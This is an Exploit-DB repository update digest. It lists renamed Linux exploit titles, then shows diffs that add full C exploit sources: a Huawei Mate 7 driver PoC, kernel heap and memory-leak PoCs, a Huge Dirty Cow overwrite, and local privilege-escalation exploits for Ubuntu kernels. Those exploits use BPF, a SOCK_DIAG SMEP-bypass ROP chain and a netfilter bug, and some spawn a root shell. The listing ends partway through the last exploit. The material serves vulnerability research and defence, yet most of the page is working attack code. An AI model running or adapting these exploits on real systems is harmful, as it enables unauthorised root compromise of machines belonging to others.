DB: 2018-03-20

9 changes to exploits/shellcodes

Linux 2.6.37-rc1 - serial_core TIOCGICOUNT Leak
Linux Kenel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak

Linux 2.6.36 IGMP - Remote Denial of Service
Linux Kernel 2.6.36 IGMP - Remote Denial of Service

Linux - SELinux W+X Protection Bypass via AIO
Linux SELinux - W+X Protection Bypass via AIO

Linux group_info refcounter - Overflow Memory Corruption
Linux Kernel - 'group_info' refcounter Overflow Memory Corruption

Linux io_submit L2TP sendmsg - Integer Overflow
Linux Kernel - io_submit L2TP sendmsg Integer Overflow

Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited
Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited

Linux ARM/ARM64 - 'perf_event_open()' Arbitrary Memory Read
Linux Kernel (ARM/ARM64) - 'perf_event_open()' Arbitrary Memory Read

Linux - 'mincore()' Uninitialized Kernel Heap Page Disclosure
Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure

Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)
Linux Kernel < 4.5.1 - Off-By-One (PoC)
Linux Kernel - 'mincore()' Heap Page Disclosure (PoC)
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)

Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH
Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) - libc NLSPATH

Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Local Buffer Overflow
Linux libc 5.3.12/5.4 (RedHat Linux 4.0) - 'vsyslog()' Local Buffer Overflow

Linux 6.1/6.2/7.0/7.1 Man Page - Source Buffer Overflow
Linux Man Page 6.1/6.2/7.0/7.1- Source Buffer Overflow

Linux VServer Project 1.2x - CHRoot Breakout
Linux VServer Project 1.2x - Chroot Breakout
Linux espfix64 - Nested NMIs Interrupting Privilege Escalation
Linux (x86) - Memory Sinkhole Privilege Escalation
Linux Kernel - 'espfix64' Nested NMIs Interrupting Privilege Escalation
Linux Kernel (x86) - Memory Sinkhole Privilege Escalation

Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass
Linux Kernel 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass

Linux - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation
Linux Kernel - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) -  'SOCK_DIAG' SMEP Bypass Local Privilege Escalation
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) -  'netfilter target_offset' Local Privilege Escalation
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation
Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation
Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation

exploits/hardware/local/44306.c

@@ -0,0 +1,45 @@
+/*
+ *
+ *  HuaWei Mate7 hifi driver Poc
+ *
+ *  Writen by pray3r, <pray3r.z@gmail.com>
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+
+#define HIFI_MISC_IOCTL_WRITE_PARAMS    _IOWR('A', 0x75, struct misc_io_sync_param)
+
+struct misc_io_sync_param {
+	void *                  para_in;           
+	unsigned int            para_size_in;       
+	void *                  para_out;           
+	unsigned int            para_size_out;   
+};
+
+int main(int arg, char **argv)
+{
+	int fd; 
+	void *in = malloc(300 * 1024);
+	void *out = malloc(100);
+	struct misc_io_sync_param poc;
+
+	poc.para_in = in;
+	poc.para_size_in = 300 * 1024;
+	poc.para_out = out;
+	poc.para_size_out = 100;
+
+	fd = open("/dev/hifi_misc", O_RDWR);
+
+	ioctl(fd, HIFI_MISC_IOCTL_WRITE_PARAMS, &poc);
+
+	free(in);
+	free(out);
+
+	return 0;
+}

exploits/linux/dos/44301.c

@@ -0,0 +1,263 @@
+/**
+ EDB Note ~ Download: http://cyseclabs.com/exploits/matreshka.c
+ Blog ~ http://cyseclabs.com/blog/cve-2016-6187-heap-off-by-one-exploit
+**/
+
+/**
+ * Quick and dirty PoC for CVE-2016-6187 heap off-by-one PoC
+ * By Vitaly Nikolenko
+ * vnik@cyseclabs.com
+ *
+ * There's no privilege escalation payload but the kernel will execute
+ * instructions from 0xdeadbeef.
+ *
+ * gcc matreshka.c -o matreshka -lpthread
+ *
+ * greetz to dmr and s1m0n
+ */
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/ipc.h>
+#include <sys/msg.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <sys/socket.h>
+#include <linux/userfaultfd.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <unistd.h>
+#include <strings.h>
+#include <unistd.h>
+#include <asm/unistd.h>
+#include <poll.h>
+#include <pthread.h>
+#include <stdint.h>
+
+void setup_pagefault(void *, unsigned, uint8_t);
+
+const int pagesize = 4096;
+
+struct {
+	long mtype;
+	char mtext[48];
+} msg;
+
+struct thread_struct {
+	int fd;
+	uint8_t h_sw; // handler switch
+	uint8_t count;
+};
+
+struct subprocess_info {
+	long a; long b; long c; long d; // 32 bytes for work_struct
+	long *complete;
+	char *path;
+	char **argv;
+	char **envp;
+	int wait;
+	int retval;
+	int (*init)(void);
+	int (*cleanup)(void);
+	void *data;
+};
+
+void *pf_handler(void *data) {
+	struct thread_struct *params = data;
+	int count = params->count;
+
+	int fd = params->fd;
+
+	for (;;) {
+		struct uffd_msg msg;
+		
+		struct pollfd pollfd[1];
+		pollfd[0].fd = params->fd;
+		pollfd[0].events = POLLIN;
+		int pollres;
+		
+		pollres = poll(pollfd, 1, -1);
+		switch (pollres) {
+		case -1:
+			perror("poll userfaultfd");
+			continue;
+			break;
+		case 0: continue; break;
+		case 1: break;
+		default:
+			exit(2);
+		}
+		if (pollfd[0].revents & POLLERR) {
+			exit(1);
+		}
+		if (!(pollfd[0].revents & POLLIN)) {
+			continue;
+		}
+		
+		int readret;
+		readret = read(fd, &msg, sizeof(msg));
+
+		if (readret == -1) {
+			if (errno == EAGAIN)
+				continue;
+			perror("read userfaultfd");
+		}
+
+		if (readret != sizeof(msg)) {
+			fprintf(stderr, "short read, not expected, exiting\n");
+			exit(1);
+		}
+		
+		long long addr = msg.arg.pagefault.address;
+    		char buf[pagesize];
+		long *ptr = (long *)buf;
+	
+		// just for lolz
+		memset(buf, 'B', pagesize);
+	
+		struct uffdio_copy cp;
+		cp.src = (long long)buf;
+		cp.dst = (long long)(addr & ~(0x1000 - 1));
+		cp.len = (long long)pagesize;
+		cp.mode = 0;
+
+		void *tmp_addr;
+
+		if (count != 3) {
+			if (count % 2)
+				tmp_addr = (void *)(0x40000000 & ~(0x1000 - 1));
+			else
+				tmp_addr = (void *)((0x40000000 & ~(0x1000 - 1)) + 0x1000);
+
+			// remap and set up the page fault hander
+			munmap(tmp_addr, 0x1000);
+	   		void *region = mmap(tmp_addr, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0);
+			setup_pagefault(tmp_addr, 0x1000, ++count);
+		} else {
+			// change the first page which is already mmaped
+			struct subprocess_info *p = (struct subprocess_info *)(0x40000000 + 0x1000 - 88);
+			p->path = 0;
+			p->cleanup = (void *)0xdeadbeef;
+		}
+		
+ 		if (ioctl(fd, UFFDIO_COPY, &cp) == -1) {
+			perror("ioctl(UFFDIO_COPY)");
+		}
+	}
+	return NULL;
+}
+
+
+void setup_pagefault(void *addr, unsigned size, uint8_t count) {
+	void *region;
+	int uffd;
+	pthread_t uffd_thread;
+	struct uffdio_api uffdio_api;
+
+	uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
+
+	if (uffd == -1) {
+		perror("syscall");
+		return;
+	}
+
+	uffdio_api.api = UFFD_API;
+	uffdio_api.features = 0;
+
+        // just to be nice
+	if (ioctl(uffd, UFFDIO_API, &uffdio_api)) {
+		fprintf(stderr, "UFFDIO_API\n");
+		exit(1);
+	}
+
+	if (uffdio_api.api != UFFD_API) {
+		fprintf(stderr, "UFFDIO_API error %Lu\n", uffdio_api.api);
+		exit(1);
+	}
+
+	struct uffdio_register uffdio_register;
+	uffdio_register.range.start = (unsigned long)addr;
+	uffdio_register.range.len = size;
+	uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
+
+	if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
+		perror("ioctl(UFFDIO_REGISTER)");
+		exit(1);
+	}
+	printf("userfaultfd ioctls: 0x%llx\n", uffdio_register.ioctls);
+
+	int expected = UFFD_API_RANGE_IOCTLS;
+	if ((uffdio_register.ioctls & expected) != expected) {
+		fprintf(stderr, "ioctl set is incorrect\n");
+		exit(1);
+	}
+
+	struct thread_struct thr_params;
+        struct thread_struct *params = (struct thread_struct *)malloc(sizeof(struct thread_struct));
+	params->fd = uffd;
+        params->count = count;
+	pthread_create(&uffd_thread, NULL, pf_handler, (void *)params);
+}
+
+int main(int argc, char **argv) {
+	void *region, *map;
+	pthread_t uffd_thread;
+	int uffd, msqid, i;
+
+	region = (void *)mmap((void *)0x40000000, 0x2000, PROT_READ|PROT_WRITE,
+                               MAP_FIXED|MAP_PRIVATE|MAP_ANON, -1, 0);
+
+	if (!region) {
+		perror("mmap");
+		exit(2);
+	}
+
+	setup_pagefault(region + 0x1000, 0x1000, 1);
+
+	printf("my pid = %d\n", getpid());
+
+	if (!map) {
+		perror("mmap");
+	}
+
+	//memset(msg.mtext, 'A', sizeof(msg.mtext)-1);
+	unsigned long *p = (unsigned long *)msg.mtext;
+	for (i = 0; i < 6; i++) {
+		*p ++ = 0x0000000040000000 + 0x1000 - 88;
+	}
+	msg.mtype = 1;
+
+	msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
+
+	for (i = 0; i < 320; i++) { // that's generally the limit
+		if (msgsnd(msqid, &msg, 48, 0) == -1) {
+			perror("msgsnd");
+			return -1;
+		}
+	}
+
+	char buf[96];
+	p = (unsigned long *)buf;
+
+	for (i = 0; i < 11; i++) {
+		*p ++ = 0x40000000 + 0x1000 - 88;
+	}
+	*p ++ = 0xfffffffffffffff;
+
+	int fd = open("/proc/self/attr/current", O_RDWR);
+	write(fd, buf, 96);
+
+        // go figure why we do it 3 times
+	msgsnd(msqid, &msg, 48, 0);
+	msgsnd(msqid, &msg, 48, 0);
+	msgsnd(msqid, &msg, 48, 0);
+
+	socket(22, AF_INET, 0);
+
+	close(fd);
+	return 0;
+}

exploits/linux/dos/44304.c

@@ -0,0 +1,40 @@
+/*
+ * The source is modified from 
+ * https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+ * I try to find out infomation useful from the infoleak
+ * The kernel address can be easily found out from the uninitialized memory
+ * leaked from kernel, which can help bypass kaslr
+ */
+
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <sys/mman.h>
+#include <err.h>
+#include <stdio.h>
+
+int main(void) {
+  unsigned char buf[getpagesize()/sizeof(unsigned char)];
+  int right = 1;
+  unsigned long addr = 0;
+  
+  /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
+  if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)
+    err(1, "mmap");
+
+  while(right){
+    /* Touch a mishandle with this type mapping */
+    if (mincore((void*)0x86000000, 0x1000000, buf))
+      perror("mincore");
+    for( int n=0; n<getpagesize()/sizeof(unsigned char); n++) {
+      addr = *(unsigned long*)(&buf[n]);
+      /* Kernel address space, may need some mask&offset */
+      if(addr > 0xffffffff00000000){
+	right = 0;
+	goto out;
+      }
+    }
+  }
+ out:
+  printf("%p\n", addr);
+  return 0;
+}

exploits/linux/dos/44305.c

@@ -0,0 +1,91 @@
+/*
+ * The code is modified from https://www.exploit-db.com/exploits/43199/
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <sys/mman.h>
+#include <err.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <sched.h>
+#include <pthread.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#define TRIES_PER_PAGE (20000000)
+#define PAGE_SIZE (0x1000)
+#define MEMESET_VAL (0x41)
+#define MAP_SIZE (0x200000)
+#define STRING "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+#define OFFSIZE ((sizeof(STRING)-1)/sizeof(char))
+
+struct args{
+  int fd;
+  void *p;
+  int stop;
+  off_t off;
+  char *chp;
+};
+
+void *write_thread(struct args *arg) {
+  for (int i = 0; i < TRIES_PER_PAGE && !arg->stop; i++) {
+    lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);
+    write(arg->fd, STRING, sizeof(STRING));
+    lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);
+  }
+  return NULL;
+}
+
+void *wait_for_success(struct args *arg) {
+  while(*(arg->chp+arg->off*OFFSIZE) != 'A') {
+    int i = madvise(arg->p, MAP_SIZE, MADV_DONTNEED);
+    sched_yield();
+  }
+  arg->stop = 1;
+  return NULL;
+}
+
+int main(void) {
+  struct args arg;
+
+  arg.off = 0;
+  
+  arg.p =  mmap((void*)0x40000000, MAP_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+  
+  if(arg.p == MAP_FAILED)
+    perror("[!] mmap()");
+  arg.chp = arg.p;
+  printf("mmap address is %p\n", arg.p);
+  madvise(arg.p, MAP_SIZE, MADV_HUGEPAGE);
+
+  arg.fd = open("/proc/self/mem", O_RDWR);
+  if (arg.fd < 0) {
+    perror("[!] open()");
+    return 1;
+  }
+  
+  
+  while(arg.off < PAGE_SIZE/sizeof(STRING)) {
+    arg.stop = 0;
+    pthread_t thread0, thread1;
+    int ret = pthread_create(&thread0, NULL, (void *)wait_for_success, &arg);
+    ret |= pthread_create(&thread1, NULL, (void *)write_thread, &arg);
+    
+    if (ret) {
+      perror("[!] pthread_create()");
+      return 1;
+    }
+    
+    pthread_join(thread0, NULL);
+    pthread_join(thread1, NULL); 
+   
+    printf("[*] Done 0x%x String\n", arg.off);
+    arg.off++;
+  }
+  printf("[*] Overwrite a page\n");
+  printf("%s\n", arg.p);
+  return 0;
+}

exploits/linux/local/44298.c

@@ -0,0 +1,247 @@
+/*
+ * Ubuntu 16.04.4 kernel priv esc
+ *
+ * all credits to @bleidl
+ * - vnik
+ */
+
+// Tested on:
+// 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64
+// if different kernel adjust CRED offset + check kernel stack size
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <string.h>
+#include <linux/bpf.h>
+#include <linux/unistd.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <sys/stat.h>
+#include <stdint.h>
+
+#define PHYS_OFFSET 0xffff880000000000
+#define CRED_OFFSET 0x5f8
+#define UID_OFFSET 4
+#define LOG_BUF_SIZE 65536
+#define PROGSIZE 328
+
+int sockets[2];
+int mapfd, progfd;
+
+char *__prog = 	"\xb4\x09\x00\x00\xff\xff\xff\xff"
+		"\x55\x09\x02\x00\xff\xff\xff\xff"
+		"\xb7\x00\x00\x00\x00\x00\x00\x00"
+		"\x95\x00\x00\x00\x00\x00\x00\x00"
+		"\x18\x19\x00\x00\x03\x00\x00\x00"
+		"\x00\x00\x00\x00\x00\x00\x00\x00"
+		"\xbf\x91\x00\x00\x00\x00\x00\x00"
+		"\xbf\xa2\x00\x00\x00\x00\x00\x00"
+		"\x07\x02\x00\x00\xfc\xff\xff\xff"
+		"\x62\x0a\xfc\xff\x00\x00\x00\x00"
+		"\x85\x00\x00\x00\x01\x00\x00\x00"
+		"\x55\x00\x01\x00\x00\x00\x00\x00"
+		"\x95\x00\x00\x00\x00\x00\x00\x00"
+		"\x79\x06\x00\x00\x00\x00\x00\x00"
+		"\xbf\x91\x00\x00\x00\x00\x00\x00"
+		"\xbf\xa2\x00\x00\x00\x00\x00\x00"
+		"\x07\x02\x00\x00\xfc\xff\xff\xff"
+		"\x62\x0a\xfc\xff\x01\x00\x00\x00"
+		"\x85\x00\x00\x00\x01\x00\x00\x00"
+		"\x55\x00\x01\x00\x00\x00\x00\x00"
+		"\x95\x00\x00\x00\x00\x00\x00\x00"
+		"\x79\x07\x00\x00\x00\x00\x00\x00"
+		"\xbf\x91\x00\x00\x00\x00\x00\x00"
+		"\xbf\xa2\x00\x00\x00\x00\x00\x00"
+		"\x07\x02\x00\x00\xfc\xff\xff\xff"
+		"\x62\x0a\xfc\xff\x02\x00\x00\x00"
+		"\x85\x00\x00\x00\x01\x00\x00\x00"
+		"\x55\x00\x01\x00\x00\x00\x00\x00"
+		"\x95\x00\x00\x00\x00\x00\x00\x00"
+		"\x79\x08\x00\x00\x00\x00\x00\x00"
+		"\xbf\x02\x00\x00\x00\x00\x00\x00"
+		"\xb7\x00\x00\x00\x00\x00\x00\x00"
+		"\x55\x06\x03\x00\x00\x00\x00\x00"
+		"\x79\x73\x00\x00\x00\x00\x00\x00"
+		"\x7b\x32\x00\x00\x00\x00\x00\x00"
+		"\x95\x00\x00\x00\x00\x00\x00\x00"
+		"\x55\x06\x02\x00\x01\x00\x00\x00"
+		"\x7b\xa2\x00\x00\x00\x00\x00\x00"
+		"\x95\x00\x00\x00\x00\x00\x00\x00"
+		"\x7b\x87\x00\x00\x00\x00\x00\x00"
+		"\x95\x00\x00\x00\x00\x00\x00\x00";
+
+char bpf_log_buf[LOG_BUF_SIZE];
+
+static int bpf_prog_load(enum bpf_prog_type prog_type,
+		  const struct bpf_insn *insns, int prog_len,
+		  const char *license, int kern_version) {
+	union bpf_attr attr = {
+		.prog_type = prog_type,
+		.insns = (__u64)insns,
+		.insn_cnt = prog_len / sizeof(struct bpf_insn),
+		.license = (__u64)license,
+		.log_buf = (__u64)bpf_log_buf,
+		.log_size = LOG_BUF_SIZE,
+		.log_level = 1,
+	};
+
+	attr.kern_version = kern_version;
+
+	bpf_log_buf[0] = 0;
+
+	return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
+}
+
+static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
+		   int max_entries) {
+	union bpf_attr attr = {
+		.map_type = map_type,
+		.key_size = key_size,
+		.value_size = value_size,
+		.max_entries = max_entries
+	};
+
+	return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
+}
+
+static int bpf_update_elem(uint64_t key, uint64_t value) {
+	union bpf_attr attr = {
+		.map_fd = mapfd,
+		.key = (__u64)&key,
+		.value = (__u64)&value,
+		.flags = 0,
+	};
+
+	return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
+}
+
+static int bpf_lookup_elem(void *key, void *value) {
+	union bpf_attr attr = {
+		.map_fd = mapfd,
+		.key = (__u64)key,
+		.value = (__u64)value,
+	};
+
+	return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
+}
+
+static void __exit(char *err) {
+	fprintf(stderr, "error: %s\n", err);
+	exit(-1);
+}
+
+static void prep(void) {
+	mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);
+	if (mapfd < 0)
+		__exit(strerror(errno));
+
+	progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
+			(struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);
+
+	if (progfd < 0)
+		__exit(strerror(errno));
+
+	if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
+		__exit(strerror(errno));
+
+	if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
+		__exit(strerror(errno));
+}
+
+static void writemsg(void) {
+	char buffer[64];
+
+	ssize_t n = write(sockets[0], buffer, sizeof(buffer));
+
+	if (n < 0) {
+		perror("write");
+		return;
+	}
+	if (n != sizeof(buffer))
+		fprintf(stderr, "short write: %lu\n", n);
+}
+
+#define __update_elem(a, b, c) \
+	bpf_update_elem(0, (a)); \
+	bpf_update_elem(1, (b)); \
+	bpf_update_elem(2, (c)); \
+	writemsg();
+
+static uint64_t get_value(int key) {
+	uint64_t value;
+
+	if (bpf_lookup_elem(&key, &value))
+		__exit(strerror(errno));
+
+	return value;
+}
+
+static uint64_t __get_fp(void) {
+	__update_elem(1, 0, 0);
+
+	return get_value(2);
+}
+
+static uint64_t __read(uint64_t addr) {
+	__update_elem(0, addr, 0);
+
+	return get_value(2);
+}
+
+static void __write(uint64_t addr, uint64_t val) {
+	__update_elem(2, addr, val);
+}
+
+static uint64_t get_sp(uint64_t addr) {
+	return addr & ~(0x4000 - 1);
+}
+
+static void pwn(void) {
+	uint64_t fp, sp, task_struct, credptr, uidptr;
+
+	fp = __get_fp();
+	if (fp < PHYS_OFFSET)
+		__exit("bogus fp");
+	
+	sp = get_sp(fp);
+	if (sp < PHYS_OFFSET)
+		__exit("bogus sp");
+	
+	task_struct = __read(sp);
+
+	if (task_struct < PHYS_OFFSET)
+		__exit("bogus task ptr");
+
+	printf("task_struct = %lx\n", task_struct);
+
+	credptr = __read(task_struct + CRED_OFFSET); // cred
+
+	if (credptr < PHYS_OFFSET)
+		__exit("bogus cred ptr");
+
+	uidptr = credptr + UID_OFFSET; // uid
+	if (uidptr < PHYS_OFFSET)
+		__exit("bogus uid ptr");
+
+	printf("uidptr = %lx\n", uidptr);
+	__write(uidptr, 0); // set both uid and gid to 0
+
+	if (getuid() == 0) {
+		printf("spawning root shell\n");
+		system("/bin/bash");
+		exit(0);
+	}
+
+	__exit("not vulnerable?");
+}
+
+int main(int argc, char **argv) {
+	prep();
+	pwn();
+
+	return 0;
+}

exploits/linux/local/44299.c

@@ -0,0 +1,153 @@
+/** 
+ * based on the exploit by SynQ
+ *
+ * Modified PoC for CVE-2013-1763 with SMEP bypass
+ * Presentation: Practical SMEP Bypass Techniques on Linux
+ * Vitaly Nikolenko
+ * vnik@cyseclabs.com
+ * 
+ * Target: Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:13:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
+ *
+ * gcc sockdiag_smep.c -O2 -o pwn 
+ */
+
+/**
+ EDB Note: Video ~ https://youtu.be/jHJd-5NvWlQ
+**/
+
+#include <unistd.h>
+#include <sys/socket.h>
+#include <netinet/tcp.h>
+#include <errno.h>
+#include <linux/if.h>
+#include <linux/filter.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <linux/inet_diag.h>
+#include <sys/mman.h>
+#include <assert.h>
+//#include <linux/sock_diag.h>
+//#include <linux/unix_diag.h>
+//#include <linux/netlink.h>
+#include "sock_diag.h"
+#include "unix_diag.h"
+#include "netlink.h"
+
+unsigned long user_cs;
+unsigned long user_ss;
+unsigned long user_rflags;
+
+typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+_commit_creds commit_creds;
+_prepare_kernel_cred prepare_kernel_cred;
+unsigned long sock_diag_handlers, nl_table;
+
+static void saveme() {
+	asm(
+	"movq %%cs, %0\n"
+	"movq %%ss, %1\n"
+	"pushfq\n"
+	"popq %2\n"
+	: "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory" 		);
+}
+
+void shell(void) {
+	if(!getuid())
+		system("/bin/sh");
+
+	exit(0);
+}
+
+static void restore() {
+	asm volatile(
+	"swapgs ;"
+	"movq %0, 0x20(%%rsp)\t\n"
+	"movq %1, 0x18(%%rsp)\t\n"
+	"movq %2, 0x10(%%rsp)\t\n"
+	"movq %3, 0x08(%%rsp)\t\n"
+	"movq %4, 0x00(%%rsp)\t\n"
+	"iretq"
+	: : "r" (user_ss),
+	    "r" ((unsigned long)0x36000000),
+	    "r" (user_rflags),
+	    "r" (user_cs),
+	    "r" (shell)
+	);
+}
+
+int __attribute__((regparm(3)))
+kernel_code()
+{
+	commit_creds(prepare_kernel_cred(0));
+	restore();
+	
+	return -1;
+}
+
+int main(int argc, char*argv[])
+{
+	int fd;
+
+	struct sock_diag_handler {
+		__u8 family;
+		int (*dump)(void *a, void *b);
+	};
+
+	unsigned family;
+	struct {
+		struct nlmsghdr nlh;
+		struct unix_diag_req r;
+	} req;
+
+	if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
+		printf("Can't create sock diag socket\n");
+		return -1;
+	}
+
+	void *mapped;
+	void *fakestruct;
+	struct sock_diag_handler a;
+	a.dump = (void *)0xffffffff8100b74f;
+
+	commit_creds = (_commit_creds) 0xffffffff8107ee30;
+	prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107f0c0;
+
+	assert((fakestruct = mmap((void *)0x10000, 0x10000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE, 0, 0)) == (void*)0x10000);
+	memcpy(fakestruct+0xad38, &a, sizeof(a));
+
+	assert((mapped = mmap((void*)0x35000000, 0x10000000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_POPULATE|MAP_FIXED|MAP_GROWSDOWN, 0, 0)) == (void*)0x35000000);
+
+	unsigned long *fakestack = (unsigned long *)mapped;
+	*fakestack ++= 0xffffffff01661ef4;
+	int p;
+	for (p = 0; p < 0x1000000; p++)
+		*fakestack ++= 0xffffffff8100ad9eUL;
+	
+	fakestack = (unsigned long *)(mapped + 0x7000000);
+	printf("[+] fake stack addr = %lx\n", (long unsigned)fakestack);
+	*fakestack ++= 0xffffffff8133dc8fUL;
+	*fakestack ++= 0x407e0;
+	*fakestack ++= 0xffffffff810032edUL;
+	*fakestack ++= 0xdeadbeef;
+	*fakestack ++= (unsigned long)kernel_code; // transfer control to our usual shellcode
+
+	memset(&req, 0, sizeof(req));
+	req.nlh.nlmsg_len = sizeof(req);
+	req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
+	req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
+	req.nlh.nlmsg_seq = 123456;
+
+	req.r.sdiag_family = 45;
+
+	req.r.udiag_states = -1;
+	req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
+
+	saveme();
+	if ( send(fd, &req, sizeof(req), 0) < 0) {
+		printf("bad send\n");
+		close(fd);
+		return -1;
+	}
+}

exploits/linux/local/44300.c

@@ -0,0 +1,267 @@
+/**
+ EDB Note: Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44300.zip
+ Video ~ https://www.youtube.com/watch?v=qchiJn94kTo
+**/
+
+/** decr.c **/
+/**
+ * Ubuntu 16.04 local root exploit - netfilter target_offset OOB
+ * check_compat_entry_size_and_hooks/check_entry
+ *
+ * Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
+ *
+ * Vitaly Nikolenko
+ * vnik@cyseclabs.com
+ * 23/04/2016
+ *
+ *
+ * ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
+ * automatic loading).
+ *
+ * vnik@ubuntu:~$ uname -a
+ * Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
+ * vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
+ * vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
+ * vnik@ubuntu:~$ ./decr 
+ * netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
+ * [!] Decrementing the refcount. This may take a while...
+ * [!] Wait for the "Done" message (even if you'll get the prompt back).
+ * vnik@ubuntu:~$ [+] Done! Now run ./pwn
+ * 
+ * vnik@ubuntu:~$ ./pwn
+ * [+] Escalating privs...
+ * root@ubuntu:~# id
+ * uid=0(root) gid=0(root) groups=0(root)
+ * root@ubuntu:~# 
+ * 
+ */
+
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sched.h>
+#include <linux/sched.h>
+#include <errno.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ptrace.h>
+#include <netinet/in.h>
+#include <net/if.h>
+#include <linux/netfilter_ipv4/ip_tables.h>
+#include <linux/netlink.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#define MALLOC_SIZE 66*1024
+
+int check_smaep() {
+	FILE *proc_cpuinfo;
+	char fbuf[512];
+
+	proc_cpuinfo = fopen("/proc/cpuinfo", "r");
+
+	if (proc_cpuinfo < 0) {
+		perror("fopen");
+		return -1;
+	}
+
+	memset(fbuf, 0, sizeof(fbuf));
+	
+	while(fgets(fbuf, 512, proc_cpuinfo) != NULL) {
+		if (strlen(fbuf) == 0)
+			continue;
